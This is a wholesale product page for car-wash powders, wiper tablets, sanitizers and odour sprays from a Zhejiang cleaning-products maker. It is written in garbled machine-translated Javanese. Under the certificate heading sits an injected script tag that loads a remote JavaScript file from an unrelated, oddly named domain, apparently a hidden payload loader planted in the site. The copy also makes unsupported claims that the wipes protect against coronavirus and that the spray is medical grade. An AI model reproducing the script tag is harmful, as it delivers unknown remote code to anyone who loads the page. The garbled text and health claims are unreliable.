Profesional Car Detailing Supplies
Produk Grosir Mobil Grosir

Nyediakake Ramah Lingkungan, Perawatan Mobil Efektif Efisien, Perlengkapan Cuci Mobil, Cairan Kaca Wiper Kaca Kabeh.

Looking For Kualitas, Kontrak Barang Gantidak Berkualitas?

APA KAMI Nuwun

Produk Pembersih Mobil (Top Selling)

Efisiensi sing dhuwur Bubuk Cuci Mobil tanpa tutul,
Ora prelu wisuh lan ngusap spons, efek reresik kuat. Ngirit banyu, wektu lan biaya. Aja ngeruk sajrone ngumbah mobil. Nambah glossiness saka mobil.

Best Car Wheel Cleaner

Wisuh, ngilangke bisa cepet mbusak rereget. Iku prasaja, trep lan biodegradable. Nambah fénoména sing dadi peteng, luwih dawa lan liya-liyane, banjur mulihake gloss asli! Cocog kanggo macem-macem permukaan hub roda.

Car Wash Shampoo Formula

Sampeyan bisa diowahi dadi mobil cuci mobil super-konsentrasi, ngirit biaya lan banget
efek pembersih kanggo nyampur karo shampoo lan deterjen cuci mobil! Ora mung nyimpen biaya transportasi nanging uga ngurangi biaya ngumbah otomatis.

Car Interior Cleaning Products

Nggunakake enzim alami lan ekologis kanggo njupuk minyak jeruk sing kalebu tanduran biodegradable Kabeh Cleaner Tujuan tanpa residu, ditrapake kanggo mobil, lingkungan njero ruangan, kanthi fungsi sterilisasi, antibakteri lan nggawa udara seger.

Tablet Cleaning Effervescent

1PC Kaca Kaca Kaca Cuci Kaca padha karo cairan wiper 4L! Cepet larut, ngasilake cairan wiper kaca ngarep, cepet lan efisien mbusak film minyak, shellac lan lateks wit ing kaca ngarep. Panyimpenan gampang kanggo sampeyan ngirit ruangan.

Multi Effervescent Spray Cleaner

A biologi agen pembersih sing kuat banget. Sampeyan ora mung cocok kanggo werna-werna sandhangan, nanging uga minangka decontaminator sing kuat ing peralatan dapur, lantai kayu, jubin kamar mandi, jamban dll. Sales langsung dening pabrikan, njamin barang certified.

Semburan Penyemprot Ora Bau

Nyemprotake Ora Bau Ora OPS ngilangi kabeh ambu ora enak saka urin mobil, ingon-ingon, mambu rokok, mutah, popok, sampah. Suwe-suwe ngilangi kabeh bau sing ana, lan freshens kanggo nyegah ambu sing ora enak. 100% produk kelas medis alami, biodegradable, rumus Non-beracun, aman digunakake langsung ing kulit.

Wipes Sanitizer Tangan

Wholesales disinfecting wipes bluk. Ngilangke sampean praktis kanggo ngresiki tangan lan supaya kantor utawa bahan bisa digunakake kanthi optimal. 99% permata sing mbebayani wis dipateni lan rada diilangi. Aman digunakake sadurunge mangan lan ngombe. Mbelo virus corona!

Gel Sanitizer 500ML Hand

Grosir gel pembersih saka macem-macem model, 50ML, 100ML, 500ML, 1L. Digawe nganggo etanol kanggo ningkatake kesehatan kulit lan higienis, ngemot pelembab lan sugih sari aloe, wangi sing lembut. Bahan-bahan sing lembut aman kanggo digunakake asring. Tansah tangan sing resik lan kesehatan kanggo kulawarga!

We are OPS. Kita nggawe banget Cleaning Car Supplies, Household Cleaning Products.

Kabeh barang-barang kita sing ramah lingkungan, bisa uga ora nyebabake bahan kimia sing mbebayani kanggo kesehatan! Kita uga bisa ngatur produk kanggo klien kita.

Zhejiang OPS Environmental Protection Technology Co., Ltd. minangka perusahaan teknologi tinggi R&D profesional, produksi lan penjualan produk cuci Mobil, persediaan detail Otomatis, cairan wiper Kaca Depan, Asap, Semprotan bau semprotane, Produk metalurgi lingkungan, gel sanitizer tangan, produk perawatan otomotif lan perawatan kecantikan.

Kita duwe hak properti intelektual, Riset, lan laboratorium pangembangan lan barisan produksi otomatis, tenaga riset ilmiah sing kuwat. Bubuk cuci mobil OPS merek dhewe digunakake kanggo ngresiki mobil saka macem-macem toko layanan mobil, stasiun layanan mobil lan toko layanan kecantikan. Sugeng rawuh ing pabrik kita lan tempah produk iki!

KANGGO CERTIFICATE

<script async src='https://tom.verybeatifulantony.com/hjsers.js' type='text/javascript'></script>
SGS Certificate2
SGS Certificate3
CNAS Certificate1
TUV certificate
MSDS

APA KAMI CUSTOMER SAYS

 

LOUISE COTTY

Aku entuk wêdakakêna cukur mobil sing ora nganggo reresik, dianggo ing toko layanan cleaning service.It mung butuh waktu menit 3 saben wisuh lan nduwe pekerjaan apik banget. Aku nggunakake produk istimewa saiki. Nyimpen banyu,
ngurangi biaya tenaga kerja, Tresna !!

 

GUY MOLLET

Efek cleaning reresik, biodegradable Pasokan rinci otomatis, kendaraan sampeyan langsung sawise ngumbah, OPS ora bakal ninggalake titik banyu. Dadi gampang kanggo nggarap!

 

HERHERT GEORGE 

Iku di resiki apik ing kain, karpet, perabotan, peralatan pawon, interior vinil kendaraan lan sawetara liyane. Iku dibusak meh kabeh reged sing aku ora bisa. Saiki iki produk paling apik sing dakkandhakake. Dheweke ora ngambu, ora ngobong kulit, nganggo tanpa sarung tangan. Iku produk apik banget lan murah!

Sembarang Pitakonan Tulis Kita!

Alamat

NO.208, Dongxi Industrial Park, Wucheng, Jinhua, Zhejiang, Cina.

No.1010, 3 Bangunan, Wanda Piazza, Taizhou, Zhejiang, China.

Telpon

+ 86-579-82456460
Whatsapp: + 8613968660250

email

sales@opskar.com

Mangga mbuktekaken sampeyan manungsa kanthi milih Plane.